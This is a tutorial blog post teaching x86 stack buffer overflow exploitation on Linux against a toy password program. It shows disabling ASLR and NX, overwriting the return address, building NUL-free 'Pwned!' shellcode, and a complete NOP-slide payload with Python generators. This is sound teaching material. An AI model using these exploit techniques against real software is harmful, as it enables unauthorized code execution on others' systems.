x86 Exploitation 101: when the stack gets over its head

So, as promised, I’m starting a series of articles dedicated to the world of exploitation: once it’s over, I will go deeper with the x86 Assembly series. First things first: “what is an exploit?”. It could be described as a piece of code (or a series of commands) that takes advantage of a software vulnerability in order to cause unintended behavior (mostly arbitrary code execution, privilege escalation and others). The kind I will describe here is the one applied to buffer overflows, i.e. when data written into a buffer goes past the boundaries of the buffer itself. Buffer overflows can affect both the stack and the heap: I will examine stack buffer overflows first, as they’re definitely easier to understand than the heap ones.

I actually found out that it’s easier to start studying exploitation on Linux and then apply the theory to a Windows system, so this is the path I will follow (the x86 theory already examined still applies to a Linux system, of course). So, let’s say we have the following program, example1.c, that checks the validity of a user-typed password by comparing it with a hard-coded one (!). If they match, the user gets a cookie.

#include <stdio.h>
#include <string.h>

char *the_good_one = "gb_master";

void cookie()
{
    printf("Get a cookie!\n");
}

char check_password()
{
    char password[64];

    printf("Enter password: ");
    scanf("%s", password);

    if(!strcmp(password, the_good_one))
        return 1;
    else
        return 0;
}

int main(void)
{
    if(check_password())
    {
        printf("GOOOOOOOOOOD!\n");
        cookie();
    }
    else
    {
        printf("Wrong password\n");
    }

    return 0;
}

As you can see, in the check_password function, the scanf function writes into the password[64] local variable without checking the size of the input provided by the user: what if the string typed by the user doesn’t fit into those 64 bytes (63 characters plus the terminating NUL)? Well, a buffer overflow happens. Why should I care about a larger string copied into a smaller buffer?

Well, I already explained in a previous post how the stack works with local variables, but let me show what the stack looks like right after the call to the check_password function. First necessary step: disable the ASLR feature on the Linux machine (ASLR is a protection mechanism that randomizes the addresses of the data areas of the program) with the following command, as root:

echo 0 > /proc/sys/kernel/randomize_va_space

I’ll talk about how to circumvent this protection as well, anyway. By the way, as GCC compiles the code (by default) in a slightly different way than the Microsoft compiler, I had to add a few options to make the output look as similar as possible and to have a less “traumatizing” experience.

gcc example1.c -m32 -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -zexecstack -o example1

I’ll explain here the options I used:

  • -m32: I’m on a 64-bit machine – as I’m going to examine (for now) 32-bit assembly code, I need to crosscompile with this flag
  • -mpreferred-stack-boundary=2: GCC aligns the stack on a 16 byte boundary, but this makes the generated code less readable. As we don’t need ALL that optimization here, the choice to align on a 4 byte boundary has been made (2^2)
  • -mno-accumulate-outgoing-args: GCC uses by default a series of SUB and MOVs to pass the parameters to the functions. Again, this is an optimization we can disable for readability’s sake
  • -zexecstack: marks the stack as executable, i.e. it disables the NX protection for it, which is another mechanism to protect from buffer overflow attacks (later I’ll examine how to circumvent this protection as well)

With the help of GDB it is possible to print the stack status at the desired time by placing a breakpoint at the right point of code:

$ gdb -q example1
Reading symbols from example1...(no debugging symbols found)...done.
(gdb) disass check_password
Dump of assembler code for function check_password:
   0x080484bd <+0>:     push   ebp
   0x080484be <+1>:     mov    ebp,esp
   0x080484c0 <+3>:     sub    esp,0x40
   0x080484c3 <+6>:     push   0x80485e8
   0x080484c8 <+11>:    call   0x8048360 <printf@plt>
   0x080484cd <+16>:    add    esp,0x4
   0x080484d0 <+19>:    lea    eax,[ebp-0x40]
   0x080484d3 <+22>:    push   eax
   0x080484d4 <+23>:    push   0x80485f9
   0x080484d9 <+28>:    call   0x80483a0 <__isoc99_scanf@plt>
   0x080484de <+33>:    add    esp,0x8
   0x080484e1 <+36>:    mov    eax,ds:0x804986c
   0x080484e6 <+41>:    push   eax
   0x080484e7 <+42>:    lea    eax,[ebp-0x40]
   0x080484ea <+45>:    push   eax
   0x080484eb <+46>:    call   0x8048350 <strcmp@plt>
   0x080484f0 <+51>:    add    esp,0x8
   0x080484f3 <+54>:    test   eax,eax
   0x080484f5 <+56>:    jne    0x80484fe <check_password+65>
   0x080484f7 <+58>:    mov    eax,0x1
   0x080484fc <+63>:    jmp    0x8048503 <check_password+70>
   0x080484fe <+65>:    mov    eax,0x0
   0x08048503 <+70>:    leave
   0x08048504 <+71>:    ret
End of assembler dump.
(gdb) break *check_password+6
Breakpoint 1 at 0x80484c3
(gdb) r
Starting program: /home/gb_master/example1

Breakpoint 1, 0x080484c3 in check_password ()
(gdb) x/20x $esp
0xffffd220:     0x00000000      0x00ca0000      0x00000001      0x08048321
0xffffd230:     0xffffd49e      0x0000002f      0x08049840      0x08048592
0xffffd240:     0x00000001      0xffffd304      0xffffd30c      0xf7e3d27d
0xffffd250:     0xf7fb13c4      0xf7ffd000      0x0804854b      0xf7fb1000
0xffffd260:     0xffffd268      0x0804850d      0x00000000      0xf7e23a63

The whole stack can be represented in the good old way:

EBP:  0xFFFFD260
ESP:  0xFFFFD220

                        ADDRESS
STACK:   ^              0xFFFFD264:  0x0804850D (EIP address to be restored)
         |      EBP ->  0xFFFFD260:  0xFFFFD268 (previous stack frame)
         |              0xFFFFD25C:  undefined  (password buffer...)
         |              ...
         |      ESP ->  0xFFFFD220:  undefined  (...until here)

So, the password variable address is 0xFFFFD220: what happens if we start writing from here a string longer than the space reserved for the variable itself? Well, we would go past 0xFFFFD25F and start overwriting the address of the previous stack frame and then the address of the next instruction to be executed once the current function is over. That is the vulnerability!

Overwriting them with totally invalid data is actually very simple: an input string 64+4+4 characters long is enough to get rid of the correct values of both the old stack frame pointer and the EIP to be restored. Trying is very easy:
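To make the layout more tangible, here is a toy Python 3 model of that stack frame: a minimal sketch, not what the CPU really does. The saved EBP and EIP values are the ones from my dump; the function name simulate_scanf and the extra word of “caller’s frame” are just assumptions made for the illustration.

```python
import struct

BUF_SIZE = 64  # sizeof(password) in check_password()


def simulate_scanf(user_input: bytes) -> dict:
    """Model the check_password() frame and an unchecked scanf("%s") write."""
    # Frame layout, from low to high addresses:
    # password[64] | saved EBP | saved EIP | one word of the caller's frame
    frame = bytearray(BUF_SIZE)
    frame += struct.pack("<I", 0xFFFFD268)  # saved EBP (value from the dump)
    frame += struct.pack("<I", 0x0804850D)  # saved EIP (value from the dump)
    frame += struct.pack("<I", 0x00000000)  # headroom, hypothetical content

    data = user_input + b"\x00"  # scanf appends the terminating NUL
    if len(data) > len(frame):
        raise ValueError("input longer than this toy model")
    frame[:len(data)] = data  # no bounds check, exactly like scanf("%s")

    saved_ebp, saved_eip = struct.unpack_from("<II", frame, BUF_SIZE)
    return {"saved_ebp": saved_ebp, "saved_eip": saved_eip}


if __name__ == "__main__":
    for n in (10, 64, 68, 72):
        r = simulate_scanf(b"A" * n)
        print(f"{n:3d} bytes -> EBP={r['saved_ebp']:#010x} EIP={r['saved_eip']:#010x}")
```

Notice that even an input of exactly 64 characters already does some damage: the terminating NUL lands on the lowest byte of the saved EBP.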

$ gdb -q example1
Reading symbols from example1...(no debugging symbols found)...done.
(gdb) r
Starting program: /home/gb_master/example1 
Enter password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

That was totally expected: the program restored 0x41414141 (which is the hexadecimal version of “AAAA”) as EIP and it seg-faulted, as there’s nothing mapped there. But this means that we can put whatever value we want inside EIP: even the address of the cookie function. That definitely deserves a try, but we need the address of the cookie function first.

(gdb) print *cookie
$1 = {<text variable, no debug info>} 0x80484ab <cookie>

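So, now what’s needed is 64+4 bytes of useless data followed by 4 bytes containing the cookie address (in little-endian order, so least significant byte first). For clarity’s sake, I will use the “B” character for the EBP-overwriting part. Note that the one-liner relies on Python 2 strings: under Python 3, sys.stdout.write would encode "\xab" as two UTF-8 bytes and break the address.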

$ python -c 'import sys; sys.stdout.write("A"*64 + "BBBB" + "\xab\x84\x04\x08")' | ./example1
Enter password: Get a cookie!
Segmentation fault

So, we practically executed the cookie function! But it’s still seg-faulting… WHY? That’s because, once cookie is over, its RET pops the next value on the stack as return address, and nothing valid was put there; on top of that, the program restored a bad stack frame pointer (0x42424242, which is the hexadecimal version of “BBBB”). But this is cool enough: we changed the execution flow!
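For those who only have Python 3 around, the same payload can be built with bytes and struct: a small sketch under the assumption that cookie sits at the address GDB gave me (it will be different on another build). The build_payload name and the --raw switch are mine, just for the example.

```python
import struct
import sys

COOKIE_ADDR = 0x080484AB  # from "print *cookie" in GDB; differs on other builds


def build_payload(target: int) -> bytes:
    filler = b"A" * 64               # fills password[64]
    fake_ebp = b"BBBB"               # lands on the saved EBP
    ret = struct.pack("<I", target)  # little-endian: ab 84 04 08
    return filler + fake_ebp + ret


if __name__ == "__main__":
    payload = build_payload(COOKIE_ADDR)
    if "--raw" in sys.argv[1:]:
        sys.stdout.buffer.write(payload)  # raw bytes, meant to be piped
    else:
        print(payload.hex())              # human-readable dump
```

Saved under a hypothetical name like ret2cookie.py, it would be used as python3 ret2cookie.py --raw | ./example1. The "<I" format is what takes care of the byte order, and it’s also the reason why “AAAA” showed up as 0x41414141 in EIP.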

The problem here is that we’re relying on some code that was already present in the program: a sort of half-arbitrary code execution. Not enough! Luckily there’s a way to execute fully-arbitrary code. In order to do that, it’s necessary to write the arbitrary code, which is called shellcode, inside the stack space of the variable, and to have the EIP register pointing at the variable buffer. Obviously the shellcode should be as short as possible, in order to fit into the variable space; also, as the writing operation on the variable is usually performed with a string copy function, the shellcode MUST be (in such a situation) NUL-free, i.e. it must not contain the 0x00 byte (otherwise the copy operation would stop before reaching the end of the shellcode). In our case the copy is done by scanf("%s"), which also stops at whitespace, so bytes like 0x20 and 0x0A have to be avoided too. Finally, a shellcode has to be self-contained: it can only rely on its own bytes, without referencing data stored in the data section.
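Checking these constraints by eye gets boring quickly, so here is a tiny Python 3 helper: a sketch that assumes the input goes through scanf("%s") in the C locale, so the forbidden set is NUL plus the six whitespace characters. The names BAD_BYTES and find_bad_bytes are made up for the example; the two sample byte strings are the x86 encodings of mov eax, 4 and of xor eax, eax followed by mov al, 4.

```python
# Bytes that end the copy: NUL for the str* functions, plus the whitespace
# characters that make scanf("%s") stop reading (assumption: C locale).
BAD_BYTES = b"\x00\x09\x0a\x0b\x0c\x0d\x20"


def find_bad_bytes(code: bytes, bad: bytes = BAD_BYTES) -> list:
    """Return (offset, byte) pairs for every forbidden byte found in code."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


if __name__ == "__main__":
    naive = bytes.fromhex("b804000000")  # mov eax, 4
    clean = bytes.fromhex("31c0b004")    # xor eax, eax / mov al, 4
    print("naive:", find_bad_bytes(naive))
    print("clean:", find_bad_bytes(clean))
```

If the vulnerable program used a different input function, the bad parameter would have to be adapted to whatever that function treats as a terminator.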

Wikipedia kindly classifies the shellcodes into four categories:

  • Local: a shellcode used to exploit a local vulnerability, usually in a higher-privileged process, in order to gain the same privileges as the vulnerable process
  • Remote: the attacker aims to exploit a vulnerability on another machine, usually by sending the shellcode through a TCP/IP connection
  • Download and execute: a remote shellcode that downloads and executes malware on the target system
  • Staged: a small shellcode that downloads a bigger shellcode into the process memory

As a first example, I’ll just print a “Pwned!” string and then exit the program. How could I do this? Well, first of all I need the assembly code for such an operation. Using the code of the equivalent compiled C program isn’t advisable, as we’re aiming for the shortest shellcode possible (and anyway the C program would use the printf function, or an equivalent one). So it’s time to code this by hand. The shortest way to do this, as far as I know, is to call the write system call of the Linux kernel directly, which needs the following information:

  • File descriptor stored in EBX
  • String address stored in ECX
  • String length stored in EDX

As usual, to perform a system call on 32-bit Linux, it’s necessary to store the number of the desired system call (listed in unistd.h) in EAX and execute an INT 0x80. I know I haven’t covered this x86 ASM instruction yet, but it wasn’t really necessary at the time: it will be properly explained later, in the more advanced x86 ASM series. For now it is sufficient to know that executing INT 0x80 on a Linux machine means calling the kernel and executing the desired system call.

At the end of the shellcode we MUST exit from the process, otherwise the CPU would go on executing whatever meaningless bytes follow the shellcode. Doing this is easy, as the Linux kernel provides the exit system call. In the end, I came up with the following code:
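If the register business looks abstract, the very same system call can be reached from Python 3 through os.write, which is a thin wrapper around write. This is only a sketch to show which argument ends up in which register with the INT 0x80 convention; the pwned function name is made up.

```python
import os


def pwned(fd: int = 1) -> int:
    """Issue write(fd, "Pwned!", 6) and return the number of bytes written."""
    # With the int 0x80 convention the three arguments would travel as:
    #   fd             -> EBX
    #   buffer address -> ECX
    #   buffer length  -> EDX
    # while EAX holds the system call number (4 for write on 32-bit x86).
    return os.write(fd, b"Pwned!")


if __name__ == "__main__":
    pwned()  # prints Pwned! on stdout, without a trailing newline
    # os._exit(0) would be the counterpart of the exit system call (EAX = 1)
```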

section .data

pwned_str       db 'Pwned!'

section .text

global _start

_start:
        mov     eax, 4         ; write system call number
        mov     ebx, 1         ; stdout
        mov     ecx, pwned_str ; string address
        mov     edx, 6         ; string length
        int     0x80

        mov     eax, 1         ; exit system call number
        mov     ebx, 0         ; exit value
        int     0x80

Assembling and linking it is easy, with the following commands:

nasm -f elf32 pwned.asm
ld -m elf_i386 pwned.o -o pwned

The previous commands generate the pwned executable: by running it, you will see that it does exactly what we wanted. Now we need to get the machine code corresponding to these x86 instructions. Thank God, there’s the objdump tool, which makes this very easy:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       b8 04 00 00 00          mov    eax,0x4
 8048085:       bb 01 00 00 00          mov    ebx,0x1
 804808a:       b9 a4 90 04 08          mov    ecx,0x80490a4
 804808f:       ba 06 00 00 00          mov    edx,0x6
 8048094:       cd 80                   int    0x80
 8048096:       b8 01 00 00 00          mov    eax,0x1
 804809b:       bb 00 00 00 00          mov    ebx,0x0
 80480a0:       cd 80                   int    0x80

Hell, that’s full of NUL bytes. Even worse, it uses values from the data section. One problem at a time. Why the 0 values? That’s because we use 32-bit registers and the MOV instruction with a 32-bit register always takes a 32-bit immediate: if the value is smaller than that, the assembler has to fill the rest of the immediate with zeroes. That’s why.

Well, there’s a way to cheat: zeroing the registers with the XOR instruction and then loading the values into their low 8-bit parts, which gives:
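The padding is easy to reproduce by hand. Here is a minimal Python 3 sketch of the two MOV encodings involved (opcode B8+r with a 4-byte immediate, opcode B0+r with a 1-byte immediate); the function names are mine and the register tables only cover the four registers used in this article.

```python
import struct

REG32 = {"eax": 0, "ecx": 1, "edx": 2, "ebx": 3}
REG8 = {"al": 0, "cl": 1, "dl": 2, "bl": 3}


def mov_r32_imm32(reg: str, imm: int) -> bytes:
    # Opcode B8+r, followed by a full 4-byte little-endian immediate
    return bytes([0xB8 + REG32[reg]]) + struct.pack("<I", imm)


def mov_r8_imm8(reg: str, imm: int) -> bytes:
    # Opcode B0+r, followed by a single immediate byte
    return bytes([0xB0 + REG8[reg], imm & 0xFF])


if __name__ == "__main__":
    print(mov_r32_imm32("eax", 4).hex(" "))  # three of the five bytes are zero
    print(mov_r8_imm8("al", 4).hex(" "))     # two bytes, none of them zero
```

The 8-bit form is two bytes long and carries no padding at all, but it leaves the upper 24 bits of the register untouched, so they have to be cleared some other way.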

section .data

pwned_str       db 'Pwned!'

section .text

global _start

_start:
        xor     eax, eax
        xor     ebx, ebx
        xor     ecx, ecx
        xor     edx, edx
        mov     al, 4
        mov     bl, 1
        mov     ecx, pwned_str
        mov     dl, 6
        int     0x80

        mov     al, 1
        xor     ebx, ebx
        int     0x80

And now, objdump:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    eax,eax
 8048082:       31 db                   xor    ebx,ebx
 8048084:       31 c9                   xor    ecx,ecx
 8048086:       31 d2                   xor    edx,edx
 8048088:       b0 04                   mov    al,0x4
 804808a:       b3 01                   mov    bl,0x1
 804808c:       b9 9c 90 04 08          mov    ecx,0x804909c
 8048091:       b2 06                   mov    dl,0x6
 8048093:       cd 80                   int    0x80
 8048095:       b0 01                   mov    al,0x1
 8048097:       31 db                   xor    ebx,ebx
 8048099:       cd 80                   int    0x80

Wow, that’s cool. And the executable still works. But there is still the string issue: the MOV into ECX holds an absolute address in the data section. That can be solved with a nice trick:

section .text

global _start

_start:
        jmp     tricky_end

tricky_start:
        xor     eax, eax
        xor     ebx, ebx
        xor     ecx, ecx
        xor     edx, edx
        mov     al, 4
        mov     bl, 1
        pop     ecx
        mov     dl, 6
        int     0x80

        mov     al, 1
        xor     ebx, ebx
        int     0x80
tricky_end:
        call    tricky_start
        db      'Pwned!'

What does this code do? Well, there is a jump to the tricky_end address and then a call to tricky_start is performed. Why? Well, the CALL instruction pushes onto the stack the address of the instruction that follows it, i.e. the one to be executed after the matching RET: this means that the string address is pushed onto the stack, as I placed the string right after the CALL instruction! Popping it from the stack into the ECX register is enough to get the same result as the previous versions. As a bonus, the CALL goes backwards, so its negative displacement is encoded with 0xFF bytes instead of zeroes. Objdump, please:

$ objdump -d pwned -M intel

pwned:     file format elf32-i386


Disassembly of section .text:

08048060 <_start>:
 8048060:       eb 17                   jmp    8048079 <tricky_end>

08048062 <tricky_start>:
 8048062:       31 c0                   xor    eax,eax
 8048064:       31 db                   xor    ebx,ebx
 8048066:       31 c9                   xor    ecx,ecx
 8048068:       31 d2                   xor    edx,edx
 804806a:       b0 04                   mov    al,0x4
 804806c:       b3 01                   mov    bl,0x1
 804806e:       59                      pop    ecx
 804806f:       b2 06                   mov    dl,0x6
 8048071:       cd 80                   int    0x80
 8048073:       b0 01                   mov    al,0x1
 8048075:       31 db                   xor    ebx,ebx
 8048077:       cd 80                   int    0x80

08048079 <tricky_end>:
 8048079:       e8 e4 ff ff ff          call   8048062 <tricky_start>
 804807e:       50                      push   eax
 804807f:       77 6e                   ja     80480ef <tricky_end+0x76>
 8048081:       65                      gs
 8048082:       64                      fs
 8048083:       21                      .byte 0x21

Thank you objdump for trying to parse my string as x86 instructions. Anyway, this shellcode is clean and usable now: you’ll agree that the shellcode itself is the following string

"\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21"

where every byte has been correctly escaped. The shellcode, at the moment, is 36 bytes long, definitely shorter than our 64-byte buffer. Anyway, we need to write over the whole buffer in order to reach and overwrite the return address. That’s where the NOP slide technique comes into play (its real purpose is another one: letting the exploit work even when the return address is only approximately known, as landing anywhere in the slide is enough): the technique consists of filling the buffer with a long-enough sequence of NOP instructions followed by the shellcode. The NOP instruction (opcode 0x90) is a special instruction that actually does nothing, just wastes a cycle (it is actually encoded as XCHG EAX, EAX, i.e. it exchanges the value contained in the EAX register with itself).

So, in short, we need 64-36 = 28 NOP instructions before the shellcode. That’s pretty easy with a python command:
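Before going on, the shellcode bytes can be double-checked with a few lines of Python 3: a small sanity-check sketch that verifies the length, the embedded string and the two relative displacements used by the jump/call trick. BASE is simply the address objdump printed for _start (any other base would do, as the displacements are relative) and the rel_target helper is made up for the example.

```python
import struct

SHELLCODE = bytes.fromhex(
    "eb17" "31c0" "31db" "31c9" "31d2" "b004" "b301" "59" "b206" "cd80"
    "b001" "31db" "cd80" "e8e4ffffff" "50776e656421"
)


def rel_target(next_insn_addr: int, disp: int) -> int:
    """JMP and CALL displacements are relative to the next instruction."""
    return (next_insn_addr + disp) & 0xFFFFFFFF


BASE = 0x08048060  # address of _start in the objdump listing

jmp_disp = struct.unpack_from("<b", SHELLCODE, 1)[0]    # rel8 after opcode EB
call_disp = struct.unpack_from("<i", SHELLCODE, 26)[0]  # rel32 after opcode E8

if __name__ == "__main__":
    print("length:     ", len(SHELLCODE))
    print("jmp target: ", hex(rel_target(BASE + 2, jmp_disp)))
    print("call target:", hex(rel_target(BASE + 30, call_disp)))
    print("string:     ", SHELLCODE[30:])
```

The CALL occupies offsets 25 to 29, so the address it pushes is BASE + 30, which is exactly where the “Pwned!” bytes start.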

$ python -c 'import sys; sys.stdout.write("\x90"*(64-36) + "\xeb\x17\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xe4\xff\xff\xff\x50\x77\x6e\x65\x64\x21")' > payload

So I wrote the first part of our payload into the payload file. Now we need to append the rest of it, which will overwrite the old stack base pointer and the return address. Appending a 4-byte value that will overwrite the EBP-to-be is an easy one, as we don’t need a useful value for that:

$ python -c 'import sys; sys.stdout.write("BBBB")' >> payload

What about the return address? Well, we need the address of the password variable, as that’s where our shellcode is. A nice way to get it is to attach GDB to the running process (which is waiting for user input; 6262 is its PID here) and print the variable address:

$ gdb -q -p 6262
Attaching to process 6262
Reading symbols from /home/gb_master/example1...(no debugging symbols found)...done.
Reading symbols from /lib/i386-linux-gnu/i686/cmov/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/i386-linux-gnu/i686/cmov/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xf7fdc430 in __kernel_vsyscall ()
(gdb) break *check_password+70
Breakpoint 1 at 0x8048503
(gdb) c
Continuing.

Breakpoint 1, 0x08048503 in check_password ()
(gdb) i r
eax            0x0      0
ecx            0x67     103
edx            0xffffd270       -11664
ebx            0xf7fb1000       -134541312
esp            0xffffd270       0xffffd270
ebp            0xffffd2b0       0xffffd2b0
[...]

The ESP register points to the beginning of our buffer: 0xFFFFD270. Let’s append this address (in little-endian order) to the payload:

$ python -c 'import sys; sys.stdout.write("\x70\xd2\xff\xff")' >> payload

Now, the payload is complete. And we can test it!

$ ./example1 < payload
Pwned!$

That’s it! The string “Pwned!” has been correctly printed and the program exited.
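The three python commands used to build the payload can also be collapsed into a single Python 3 script. Take it as a sketch under my assumptions: the buffer address is the one I read from GDB (it will differ on another machine, or with ASLR enabled) and build_payload is just a name I picked. As a safety net, it refuses to build a payload containing bytes that scanf("%s") would stop at.

```python
import struct

BUF_SIZE = 64
BUF_ADDR = 0xFFFFD270  # ESP value read in GDB; machine-specific
SHELLCODE = bytes.fromhex(
    "eb1731c031db31c931d2b004b30159b206cd80"
    "b00131dbcd80e8e4ffffff50776e656421"
)
STOP_BYTES = b"\x00\x09\x0a\x0b\x0c\x0d\x20"  # NUL and whitespace


def build_payload(shellcode: bytes, buf_addr: int,
                  buf_size: int = BUF_SIZE) -> bytes:
    if len(shellcode) > buf_size:
        raise ValueError("shellcode does not fit into the buffer")
    sled = b"\x90" * (buf_size - len(shellcode))  # NOP slide
    fake_ebp = b"BBBB"                            # overwrites the saved EBP
    ret = struct.pack("<I", buf_addr)             # overwrites the saved EIP
    payload = sled + shellcode + fake_ebp + ret
    bad = sorted(set(payload) & set(STOP_BYTES))
    if bad:
        raise ValueError(f"payload contains stop bytes: {bad}")
    return payload


if __name__ == "__main__":
    print(build_payload(SHELLCODE, BUF_ADDR).hex())
```

Writing the returned bytes to a file opened with open("payload", "wb") gives the same payload file used in the test above.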

This small series about exploitation is not over yet, as I will show how to spawn a shell with a shellcode and how to circumvent the protections that were added over the years to prevent this kind of attack.
